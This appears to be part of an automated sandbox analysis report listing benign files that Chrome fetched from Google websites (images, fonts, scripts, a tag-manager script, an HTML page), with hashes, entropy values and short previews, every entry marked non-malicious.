                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d....(IDATh..[l.U....i.mk..!.S\@1..mw..%t.h ./!F"...1h$..LL@}P...>..J.........BA:MM.@.BR.;.].R.......,{....V....{....9.|s........p..}u.A.....w....e....%..7.x.@..._.,..~..C.{g....J.lN2..MgB..HN.h...Q;.n<.`Q....ac?.x.......<..Yu..I.L.C.HD.H......qW*?....fn.P9A|/@...3W....h....O2......qp..=.)...^oq[....g/..g.X..h...xk..$..H..+.n;.9..9....`6B.p9 ......=Dd...3#ql. ;.#..."....,.R.R.O2.....v.(.n...&........b ..[...M.x......z@~....{.x...`. ....m.!./uE...%..\W.3..v..Hf.W.hK[X.r..m...X.+r.....Od.+....>.>......S..........*v..3..]........b!...?....k.........5u.i..z..M....*6.{j.o.x>j..u..u.....Q......uE...n7.E2qltN.u.....?YI.d|Q.Z&"...M/]...[..#.....uE~..tE>..u....".........BQq.9..*'r....[....|v.(..p....XW.Q....`.......\...Yl.9......(....k....s&Y#N..@.SG.&.8.^..0..U.~.|s..;.4...\.k..!...0.S]N .&..j....J8.+).k.. ..Z.......\."..A.8.v#..H.....u.....<..#3..X&..L+....%..x..Y...c...]o.h.6.....n...c$r..`....uy.O..H...@...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1852
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8172847193983115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ThPq7aSyeIaxKBD0vBBg2AmOJIuQ+TuK3R/PP0:tPAaS+axe0vemSIuJTV1PP0
                                                                                                                                                                                                                                                                                          MD5:8286DD8AD1827439BB3E83CDAA8E6818
                                                                                                                                                                                                                                                                                          SHA1:CAEEC5254D6E2FCDB698B999E05302A134E316DA
                                                                                                                                                                                                                                                                                          SHA-256:8ABCAFCD512BD44D17852703BF465C67CF4B5EBB798B88E0B037AD79918A28A6
                                                                                                                                                                                                                                                                                          SHA-512:7D49CC9CA81703FC4E912A9D9652C174682D652918DC5EEA09E8431C71E7859D24488791098FDB97BE0FBE928E512381B91838D838EF9F749672D0463C79B843
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..._lTe....{...P..K..Z..&...q5....^...S.&.c$f..D/..x.F/L.0.....H..h....Xu.7."...+..Z.h...9.^..4Hg.9.g..'iH[.}....=.9..RJ)..RJ)..RJ)..RJ)..J.c...d/7 L.#..f.Gl.q.&..L..~.g_...J.=..v...o..I....F.y.y.OG55...=..l.].. ..uk..k.lW.1.....2..\....5..u.b.....<.n..4v..M8..f.V..].f.Xkcn.6....&O<...~lJ...W.<..h.f..5..+....j..X.3....9.#_..C1...0.....j..H.3...DB=...g......b..C....k..S.?..:.w..:L..*.+W..+.[...........Ux....9.....2.-z.7T...[0.Q"..b.X.......^.c.H.hm......$..pC\SD..6TU....#bnt#....R1....$p.E..hCU.b.y....)`..2\....i;..pm.S............6v....+XWn@..?...?}........hC...o}....}P.weTU+...{..:.....9..}.......t.....wO.s...Mb...4......l,.L.....My.%.{..d.X.4.x..-...c"...(.6c.N.q....5.b`|...*......<X...D.v...\.^.9)..].............f..p..s)..h...%.x.dW9\..o.D..E..:.......T.....00.......[..t..Rswa.0p...?....-..4.j8..Y,...J.T..I.E.....-d..e.9..+..p.....?...T6S..+1.i.'>Y.?.l...W......,.....V..c..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (422)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):256573
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.252782589628346
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:DG6oJT6hevPylYGFr/Vjwq4ZK72B0GfjSqDAh1wE4nWi+iDoEXcrvAVdRoXJb/v/:gPylYA/Vjt7rGnAPrvAVdRoXJbph
                                                                                                                                                                                                                                                                                          MD5:4C1804A7156D4096FA16400548C1CE42
                                                                                                                                                                                                                                                                                          SHA1:F35C7D5193909C5BC6DACDA42949AB4393906D3B
                                                                                                                                                                                                                                                                                          SHA-256:1303E6D08692DE80D3D6FB9F556D6BB04F195236CD137FE446568DE131A7D267
                                                                                                                                                                                                                                                                                          SHA-512:5723EEAF5C57AB0BBF1200C5C14CD8ED349641A78115F28EEE8F57B5644E7234E77AB01057148C6D5F8A1598474DE4C171EBF1812866F2869B7039E1853E5E99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://about.google/products/
                                                                                                                                                                                                                                                                                          Preview:..<!DOCTYPE html>...<html lang="en" dir="ltr" class="google glue-flexbox " locale="ALL_us" user-region="" path="/products/">. <head>. <meta charset="utf-8">. <meta content="initial-scale=1, minimum-scale=1, width=device-width" name="viewport">. <title>Browse All of Google&#39;s Products &amp; Services - Google</title>. <meta name="description" content="Browse a list of Google products designed to help you work and play, stay organized, get answers, keep in touch, grow your business, and more.">.. <script type="text/javascript" nonce="yQ07fgMM11-09ALr_MyS7A">. window.dataLayer = window.dataLayer || [];. window.dataLayer.push({. 'gtm.blacklist':['customScripts','nonGoogleScripts','nonGooglePixels','customPixels']. },{. 'locale_fallback': (document.childNodes[1].attributes.locale || {}).value. });. </script>. Google Tag Manager -->. <script nonce="yQ07fgMM11-09ALr_MyS7A">. function glueCookieNotificationBarLoaded() {. (functi
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7717
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.964739325563882
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:OSlMgKu4t7io7N/LkDKaPW3wMJ7jO8k0O0EV/64rx:xldKusGA/LkDKwjMJ7jOZ0i44rx
                                                                                                                                                                                                                                                                                          MD5:F303B5D83D1CA82787B6FBFF3E5CFFE7
                                                                                                                                                                                                                                                                                          SHA1:ECCFF3C0008ED7381DE1ACF4B26A633E3F0838B1
                                                                                                                                                                                                                                                                                          SHA-256:167B2BD49F989938F884C74A1C9A9D2D3B8BC8F88F23BDA67ECA219D91496199
                                                                                                                                                                                                                                                                                          SHA-512:DB12766D73D2E28747F9C67D06D527E6DA0B601CDDA046C6CD884FDE662F9E2053F8A61F3BB300F910D4D39142948CA73BDCE90A90B7183C27DDD7E113A68288
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................IDATx..y..U}.?...>../........\.....G.Fc.<F.$.K.F.[..b.B..Q......4.W.E@p.3.0....O.U]U.9...[{..]]U=....<...S.N.....DUY..9..X..b..%.e..8..^.X&x.c..%.e..8..^.X&x.c..%.e..8..^..*.......Hl.%......EQ!._.U.Eq(V./7@n.vf6.5..!.ZT.O.........y..G....|......?.8'..3..O...l.F.....0.8.}.....n`J../ ............,^L..Q...z8....;.(.....XL.[...<....yYk0..{B..L.x<.....c.O.L&c...y.2..(Be.h..~...E... .G..y...2UN...h....C.9.9..._..{.....K.`.D....j..Y"..h.+U...bu.._..8.{._'..K..;....*W9.Y]..G.7.....1..*-......a.r..r3.s.E.....z..-.v...}:..#X.....zQ.|...(..".)...6.......K.`.P}.s..2z.g...60_.1_3..?.h,n.....9..L....T.....%.....7..#.!b"......?...@.....vN^[.=.X...@..|....BP)....b.....x.. .s.....1.EK....0q,..A...J...7.1...,^r...g..vk.N.U'Rm/Z.....L.>.?a...rI..H.R..x.<.PF1..*..u.!TOH.i..,&.....&..8.B@.P`..#.......<.....}........m..-...B2..+....yV....sx..u...g.".).z7...H....Z].h..`.l..o..4.$..{;.....=.............'q.......&.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (653)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1156
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265920662110145
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:7p3alJltDIY8mMiO34abbiqHJwGzIXfOoPXSHcm:7yZVal+izQfFCHcm
                                                                                                                                                                                                                                                                                          MD5:C981B56DE2127ADB94673063364DCCB7
                                                                                                                                                                                                                                                                                          SHA1:3DFA5C46FF79B2AA4187E59B1D9F6D5CE014C307
                                                                                                                                                                                                                                                                                          SHA-256:01FA267B79C00613318CF18A88058DEB4C1C1A3176931BF9D05A549873854BBF
                                                                                                                                                                                                                                                                                          SHA-512:00FF2B4202567CF3B7B263A9A5EE8EBB664C817EE01F0D2F9381DF2A2272F822B0DA753673A7E384B86738814F1793DC582296358558700452C441E3BFD49A54
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as d,s as a,x as i}from"./ycaG4YXp.min.js";import{e as p}from"./0XPwTFcg.min.js";import{n as b}from"./IYoTYjYE.min.js";import{e as v}from"./p9kcPq91.min.js";import{Y as h}from"./rwBjrn-0.min.js";const m=".button:hover{cursor:pointer}";var f=Object.defineProperty,C=Object.getOwnPropertyDescriptor,c=(o,r,l,s)=>{for(var e=s>1?void 0:s?C(r,l):r,n=o.length-1,u;n>=0;n--)(u=o[n])&&(e=(s?u(r,l,e):u(e))||e);return s&&e&&f(r,l,e),e};let t=class extends a{constructor(){super(...arguments),this.youtubeModalController=new h(this)}connectedCallback(){super.connectedCallback(),this.youtubeModalController.init({videoId:this.videoId})}render(){return i`. ${this.videoId?i`. <slot. class="button". @click=${()=>this.handleClick()}. @focus=${()=>{const o=new CustomEvent("youtube-card-focus",{bubbles:!0,composed:!0});this.dispatchEvent(o)}}. ></slot>. `:i`<slot></slot>`}. `}handleClick(){this.youtubeModalController.open()
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1166
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):532
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.546915802300472
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XK2BXz19VAfl99dLqOcdM3DSB4pE4f2pUS89i0GrOT7TYoeZzP6xgtdEk+FuC:XKiZ2lfQOcdKE40L89i91NYiakw
                                                                                                                                                                                                                                                                                          MD5:EA542C39DC64FEC3C004092C1138DF0F
                                                                                                                                                                                                                                                                                          SHA1:BE993F65EBBE7283FB1DDD32D0D377D9D8FBC370
                                                                                                                                                                                                                                                                                          SHA-256:586617CC43D5241F7B53AFC0663759492D454620B47ADA0094067F6743162839
                                                                                                                                                                                                                                                                                          SHA-512:10343396B63A88C5F5B4D2548A1BD4A86D3B5999167DF8084C37D1E4214E60AAFB657B92DEC1D05C0AD794FB9A3B95F28E847715916324BFD15877AFF65FF041
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://recovertogether.withgoogle.com/static/images/icons/menu.svg
                                                                                                                                                                                                                                                                                          Preview:...........TQo.0.~.y/....-%.Pi.ZMj....%"...b#....0.e].f.}w..... z8.*8p..%c.......,b......Cr.5..Z...}..H..(.j.N;..~S.x...........0..IiL.t.m..w....y.....c%...#[,..EIr.8./..3.\.F.%...d%.....!.g..P."6.......P:..a*..l..r..z...A.......&K.5O......8.k.....d.6.......D*y..X=..F....W...\.<..g.xN..<SX...a=.Ne...&V.0.k.......h........j..t..x.~.....{...D<E{F....`.?.3.O.3A.S......H...}....5.U.Q(i/v....".Fa..JH..<..f....K...6..>.V.y.g....0.......z..`....A....x.gw..p\z.8..{.U..x.}+..o...3...]..2.a8)V.._@................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.845350936622435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:a3s5E3C:a3KE3C
                                                                                                                                                                                                                                                                                          MD5:169FD8A4A66188491593969BAD0F4EAB
                                                                                                                                                                                                                                                                                          SHA1:5DCF616EAED4D8DD3537549BFAF997E6726F6450
                                                                                                                                                                                                                                                                                          SHA-256:A0A1F98FCA203B8561519A06BACFDC50E4B3C4A5A71E740DA5B0875BD4FC00D6
                                                                                                                                                                                                                                                                                          SHA-512:9D4A767C5DF1CCBD92F4D19DF6A32079BC498727A4D9DB255A5C424925A589BCD3B858137B48DC07D4097A1AA329194CC2C60AA7CF3F322B7B81D9F24DCA05F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/config/2b.json?hl=en
                                                                                                                                                                                                                                                                                          Preview:{ "required": false }.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4217
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.938524730043499
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nJcxQGmS9OitIp09ec05EOkhS6gGiMSojliNX2:Jcx4+tIGYc0YhS7GiMSoRWG
                                                                                                                                                                                                                                                                                          MD5:44B83718959F1E11C1291D2962C1DAB3
                                                                                                                                                                                                                                                                                          SHA1:5597E8F846BE88066607927E8C3FAB5E95A0C652
                                                                                                                                                                                                                                                                                          SHA-256:DC3789CC4765D5CF2BA76888A40340E4CCAF6916022F3A6DFB27DF045C6FCB5B
                                                                                                                                                                                                                                                                                          SHA-512:8CD7161755EE42104A1518F2177EB1CBAEFE3EFD607AC554AF928E7A902A5F5BB8273C75F274F63003A69CFEBE153A32886C8C73FD6EA9C3D149BD0DC268C6F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/9NuRdiRepVI3n1txfg7Ky2wWzB3DvXkWABXeFMSn2tzDYYkv8T_RMA9R17fWi0ziUDIDTVJx0JruCzOev37c4dkK9Wrgkeyam3pM8lI=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{t..}.?wvV+.V...../.&<....8<".H.#..fx..J........i.Lz.3!.8!Ii^..!8)'. ........../#d.[.V.......G..>..T}..9:3s....w..w~..L1..SL1..~ .....-...x.N...q?..I%p....h...:`..!..@/....l...x...A.BV..8..Y...........u$.L...=.......z..8....&p:P.}I..,...kZ/....Xd..T3....t.....W.....T..5...]....#*....8..y&....T.$.....BA.(uG..pM{,..x......t....Gy...y..3.!.........X.-....w.c.m..x...MI...`>.B:.7....0..(...m.<.x.X.O...h.M........\{,.n...%%p...X.e<.kX.#fD.p*...X..M.C...-...[..G.xZ..!.....}..s.S..G[:..~..#....L..5gbC...k.5Y....m.t..Sl)Y..QY.....=...nTb9.|}..n.}....k.))...R[U....._n.E~...X.V....s......7.H....z#..}......Q&|...5.....|n....p-5N..:(9".]....D...k.c..^;..4......e...U..S.......2....;...]......=..=........B.D.H..../...K...!teNSCc.z..q!}...v.i..jj8.xv.vM...nn=......u.}.....H9......T..X.^9..?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65418)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):447624
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.553150464543997
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:Fznax8eulMYe5TJG00dlXol0VQbQwM87NY0RsEemtJeNmAZzVrfhZxQ8:FjpmFClq0Ud7zsEemveXbfhL
                                                                                                                                                                                                                                                                                          MD5:E274C3AC2AD908DA278C07636CF55E05
                                                                                                                                                                                                                                                                                          SHA1:9A104B676D2CA449C63E06B4A5D80D9945EE20F8
                                                                                                                                                                                                                                                                                          SHA-256:C72F8E4E986A06ADF71691499AC819918D2976A7F5AE011B44E604D8BCA007A2
                                                                                                                                                                                                                                                                                          SHA-512:4BFE7B2F17A8CA7C0C21215232A1BB3CDAAD48365FA863416FDBA83E30EF8A9ED405E6018FC2F6B38FCD624BD27D56B27A9F26EEBCA45A63A55C3C100D0D890F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-P9LKVZH
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"200",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"data.category"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"data.pagename"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",5],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_defaultValue":["macro",5],"vtp_ignoreCase":true,"vtp_map":["list",["map","key",".*\/faq\/*","value","WLC_LP_Faq"],["map","key",".*build-your-web-presence.*","value","WLC_BP_BuildW
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 8704, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8704
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973978900924564
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:e0fgRavqHJmIO6zSY5nrMMqqQIRWwRb8mGCn3NYTNzZhGtByi:e0fgRJpmirJRjbH9gJZonyi
                                                                                                                                                                                                                                                                                          MD5:95B5960B3B32B24C83C2682856358954
                                                                                                                                                                                                                                                                                          SHA1:47C054D8E82DF55DD36101F1C31DD943E6BC1653
                                                                                                                                                                                                                                                                                          SHA-256:C59688786DB8B971E0B13B388717C071D361B18175CFF22B3307BC422A4F2597
                                                                                                                                                                                                                                                                                          SHA-512:08AC35D0026F0DE7D4A1CAD96834D5EB5E6AA0468CEAA131CB89C0A619017B4FCD10C60522C27E32835ACC771ABAEB0DA4747A0E92C9F8C214942CA4A646FA40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjEUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......".......C...!..........................|.....,?HVAR.\.`?STAT..'...j/<....H.L..Z.0...6.$..0. ..B..$...D=... .q.d..K....6F......e8)..(uU&EM.V...U.T..6..*..;...uD..}..'..7n..L...'..J..n..5..q6v.....A3pq."...0..n.y0.$.h..J...!.,..g.|...]....v.=`F....Lp....$.?......e..I.B.Ue+L5.0W..q[..]$W...&.#....L..+......*..2~t..\.,......K..../.GX...B7M.!...O....h(..tYy_@z../........(!....d.A...'...{.......O\.Z......,..>....%.V5.......}.t.2....".5.Vp.vQ.[.{).E....|.k....<.`...^...0.g.=p....7k2..x:....\.<t.23Q......f.........0...?.!..e..T.$..R.&Pi<.......P..Y.RQ..IA..H&S.........}40h.X.,.[.ZvtT1..r...9.3kz=#......T.......".l.R....,.Y..g....._....Z...U...,...9I.v].! @..`x.../...DD.A.1....)R.......%J..*.U..5j....M..-Z..:.=...(..I.6mo...CV....8....mH..N.........F..."..n..l\U.QsP,......j.$.7[=.X...&..^.ct .oJ.3..C{.......@.W.W.\....`.....4.#...Qt....;7H..2....h.;...{d1..=..R..d.A,.WW....|P5<h......XZ..5..N. C.%q.........>\...^w...v..A..YN..._.G.G.~..h.G..&.X...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7040
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.960516691238449
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oxJRUegBqOJ/xbRJjUM+qv/9KTrViJyoAz7mCz4GCiJfee9YuJD4ymccoUzvyBx:oSegFJJnr+G/9KrVxhdhCeWeFwVTyX
                                                                                                                                                                                                                                                                                          MD5:B264D7924F1ABC27B4255B5EF2950A7E
                                                                                                                                                                                                                                                                                          SHA1:2A1D790BF59587BF1BADAD66F1935A4AF91FC8A1
                                                                                                                                                                                                                                                                                          SHA-256:B02E53776F1629B26AE369DCEEFABC9D88A5B61BD7141DCB5B1A2AD68DD9615C
                                                                                                                                                                                                                                                                                          SHA-512:F134076AD1D6EFAF2EE4ADB00FD29E3D0C6A71545111BD8871FA358984BDE0E354ED7DA96EA7A76FD89B195EC0A1B0CB076CC8EA1BAAB913C78658DB99813B7F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i3!3i6!4i256!2m3!1e0!2sm!3i707457593!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=58847
                                                                                                                                                                                                                                                                                          Preview:RIFFx...WEBPVP8Lk.../..?.....$.....`CA.6......?.m$)..7...8.Q........q..5K3...W.K..0...#..{i.T.h......".Q...W......C.$.m3.Q.... r...q....y....zkM.ykj.3lf."g.6..z..~.....~t}.....o.^.....?5l...5g..9....Z...b...5...7..L.C`.^M...=.....`.BU.i...._.V.l(..z.C.._.W.D.jt..`\.....W...;?......J.......z.~..{K.F-..[...ZC@.....L~....}{;.R<.)Vq...D..$....<....G."..S4<..D.I.\.L@J.ku.@.....S.R>.G.....A_..':MJ.2...Od.i...DPJ.M........{nNm.A..ir8-p.E.&....*?)8..H..D....=.L...UV..A8...S.......z.#..&.....%.)...!.(h{..F..).3.2p.+;........7.E.n...w..?......s.li.q.E.\#.l:?.,."vY.O$.......i...1.5@_......*..B=......0.6...V...i.P.u.....u...z....f.D.d.RJ.d.I.jA.^vU". .P..$.R."8..<.F.?....Akg.d...P.@.E\A<..SH.CW.....J..&.;.|...p...tM./...`%*G....z..g.d.I'Z+...(.J}Z..-j...*Q..p.s...o..U.... .......eO../.....kYd=..a....)+~"s.*.Kg...=.U]..{9`j.....0@..s...p....K.Z*.n..d.>.&.z.........65q.\TSxBY....\..]t....A.....7. ...]...O...... 7%.8M.TR..N.Y.U.@..<<.dF...,.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7783)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):11500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.241668722409222
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:sDLPGsyEzyMrMyTLI4UuK1INXM5ZK/Ko/RxgQVQQx4zQihU:sDTGsyEzJ4yHI401I90gz/RiQVQQx4Ej
                                                                                                                                                                                                                                                                                          MD5:8B3D85FB1295E523BDE8A705F8E2D8D5
                                                                                                                                                                                                                                                                                          SHA1:2B8A3FE39422B9A3108C37767C0420D3B0C92ACE
                                                                                                                                                                                                                                                                                          SHA-256:94F67DCE4F8F6E707B054C6CF608CB2EB118AD2224EDB87760E5A1ABC7D7CEDC
                                                                                                                                                                                                                                                                                          SHA-512:D16E8946B81C6DA8A8D5D1E45B4FB305B643835C0783A121A1B8BDD8B3F9F343E1A07DD60ACB6BFA2BDB0FA1BD377581786DAA9C34080BA897DF1DC2349F4C28
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/u4Ay35bP.min.js
                                                                                                                                                                                                                                                                                          Preview:import"./vQ8El_Rl.min.js";import"./IniIGeRU.min.js";import"./bS7WqXuL.min.js";import{l as v}from"./_OAi-NRQ.min.js";import{d as f,i as m}from"./HxYQzxVf.min.js";import{w}from"./zRFBfJZH.min.js";import{r as y,x as c,A as x,s as k}from"./ycaG4YXp.min.js";import{l as P,e as S}from"./0XPwTFcg.min.js";import{n as i}from"./IYoTYjYE.min.js";import{t as g}from"./ianzD0dL.min.js";import{e as b}from"./p9kcPq91.min.js";import{i as u}from"./IFunn9hk.min.js";import{o as p}from"./5Ss99t85.min.js";import{o as C}from"./RpI-OtYr.min.js";import{R as T}from"./bAPu5B1A.min.js";import"./44SUZn7a.min.js";import"./rwBjrn-0.min.js";import"./lHimDk5Y.min.js";const $='@keyframes fade-out{to{opacity:0;display:none}}@keyframes fade-in{to{opacity:1;display:block}}:host{--bds-carousel-scrollbar-height: 30px;--bds-carousel-scrollbar-track-height: 2px}bds-pagination::part(pagination-item){cursor:pointer}.container{position:relative;margin:0 auto;--feather-width: 20vw }@media (min-width: 3000px){.container{--feather-w
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1000x565, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):104459
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983105365304557
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:6RZlWT+O0JWlX2TvY2TILWRNXD9t/nUJUCW+VWKaJg80497Al3Yp2tQdXN7xmwOh:6RRJH02oWRNXDSF3aJSNc9N7A0yuZCP
                                                                                                                                                                                                                                                                                          MD5:A136BBF831A04A0215799B18B000981A
                                                                                                                                                                                                                                                                                          SHA1:22D4814299614B91CA5A0972E381CC77C370C9F8
                                                                                                                                                                                                                                                                                          SHA-256:B55EA20AC2CB168EBCD3D92CB0B2530947392EE11952E585DDE815B471546786
                                                                                                                                                                                                                                                                                          SHA-512:0D27EF8D9BC7A48F091E5CC45E4B689A756391235993473EE27413D9C2E1D6FB2F7B61706D0AB39B3F0B8D96A0CACF034DBCF19142A898185E52F549808BD5CD
                                                                                                                                                                                                                                                                                          Malicious:false
